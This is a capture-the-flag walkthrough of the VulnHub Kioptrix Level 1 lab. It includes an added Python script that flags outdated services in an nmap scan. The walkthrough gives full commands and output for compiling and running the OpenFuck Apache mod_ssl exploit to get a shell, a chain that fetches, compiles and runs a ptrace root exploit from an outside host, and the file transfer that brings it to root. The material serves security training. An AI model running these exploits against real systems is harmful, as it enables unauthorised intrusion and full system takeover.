Details
This machine is https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
NOTE: For this machine I had to make some changes to the default VM settings: disabling audio and changing the network card to PCnet-PCI II.
Recon Phase
To start, I carried out a host discovery (ping) scan with nmap to find the target:
root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00025s latency).
MAC Address: 0A:00:27:00:00:11 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0011s latency).
MAC Address: 08:00:27:17:EC:78 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.0011s latency).
MAC Address: 08:00:27:B2:55:C0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds
With my target identified as 192.168.56.102, I ran a service and version detection scan to see what was exposed:
root@kali:~# nmap -sV 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00081s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:B2:55:C0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.97 seconds
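As an added example (not part of the original walkthrough), the following Python parses the PORT STATE SERVICE VERSION table from the scan above and flags the legacy components a defender reviewing this inventory would want called out: an SSH daemon whose "protocol 1.99" banner means it still accepts protocol version 1, Apache 1.x and OpenSSL 0.9.x (both long end-of-life), and ONC RPC services reachable from the network. The sample text is constructed from the output above; the rule set, thresholds and function names are this example's own assumptions, not anything nmap emits.

```python
"""Parse an `nmap -sV` service table and flag legacy components.

Added example for this write-up; the rule set, names and thresholds are
the example's own assumptions, not something nmap itself produces.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: the service table from the scan above, pasted as text.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
"""


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str  # free-text VERSION column; may be empty


# One table row: "<port>/<proto> <state> <service> [<version ...>]".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(scan_text: str) -> list[Service]:
    """Return one Service per table row; the header and other lines are skipped."""
    services: list[Service] = []
    for raw in scan_text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m is None:
            continue
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, version.strip()))
    return services


# Review rules (this example's assumptions): (finding text, predicate).
RULES = [
    # A "protocol 1.99" banner means the server negotiates SSHv1 as well as SSHv2.
    ("accepts SSH protocol version 1",
     lambda s: s.name == "ssh" and "protocol 1." in s.version),
    # Matches both the "Apache httpd 1.x" and the "Apache/1.x" banner styles.
    ("Apache 1.x (end of life)",
     lambda s: re.search(r"Apache(?:/| httpd )1\.", s.version) is not None),
    ("OpenSSL 0.9.x (end of life)",
     lambda s: "OpenSSL/0.9." in s.version),
    ("ONC RPC service reachable from the network",
     lambda s: s.name in {"rpcbind", "status"}),
]


def review(services: list[Service]) -> list[tuple[int, str]]:
    """Apply every rule to every open service; return (port, finding) pairs."""
    findings: list[tuple[int, str]] = []
    for svc in services:
        if svc.state != "open":
            continue
        for finding, matches in RULES:
            if matches(svc):
                findings.append((svc.port, finding))
    return findings


if __name__ == "__main__":
    for port, finding in review(parse_services(SAMPLE_SCAN)):
        print(f"{port:>5}/tcp  {finding}")
```

Run against the scan above it reports seven findings across ports 22, 80, 111, 443 and 32768 and nothing for the Samba service on 139, which is the point: a version banner alone is enough to put the SSL-enabled Apache and the SSHv1-capable daemon at the top of a patching or decommissioning list before anyone reaches for an exploit.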
Service Exploitation
By checking exploit-db I came across a potential exploit against the Apache web server, https://www.exploit-db.com/exploits/764/. I had to follow some extra instructions to make it compile on my Kali 18.01 install: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. However, the OpenSSL headers installed in those instructions didn't work for me, and I had to switch to older ones:
root@kali:~# apt install libssl1.0-dev
Which then allowed the exploit to compile:
root@kali:~# gcc -o OpenFuck OpenFuck.c -lcrypto
With the exploit compiled, I looked at the instructions and found some potential "box names" (target offsets) to use:
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
I started by trying 0x6a:
root@kali:~# ./OpenFuck 0x6a 192.168.56.102
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!
This didn't work, so I tried 0x6b:
root@kali:~# ./OpenFuck 0x6b 192.168.56.102
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--17:44:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
The error downloading the file was expected: the machine was on an isolated network, so it could not reach the internet to fetch it.
Priv Esc
Instead I downloaded it onto my Kali machine from http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c. Then, using apache2 on my Kali machine and wget on the target, I transferred it across:
root@kali:~# cp ptrace-kmod.c /var/www/html/ptrace-kmod.c
root@kali:~# apache2ctl start
bash-2.05$ cd /tmp
bash-2.05$ wget 192.168.56.101/ptrace-kmod.c
--18:17:47-- http://192.168.56.101/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.101:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
18:17:47 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
With the exploit transferred, I compiled and ran it:
bash-2.05$ gcc -o p ptrace-kmod.c
bash-2.05$ ./p
[+] Attached to 1001
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
#
And that spawned a new shell:
# whoami
root
Now I had the machine rooted, but finding the flag took a while; eventually I found it in root's mail:
# cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path:
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...
And with that I was ready to move on to the next machine.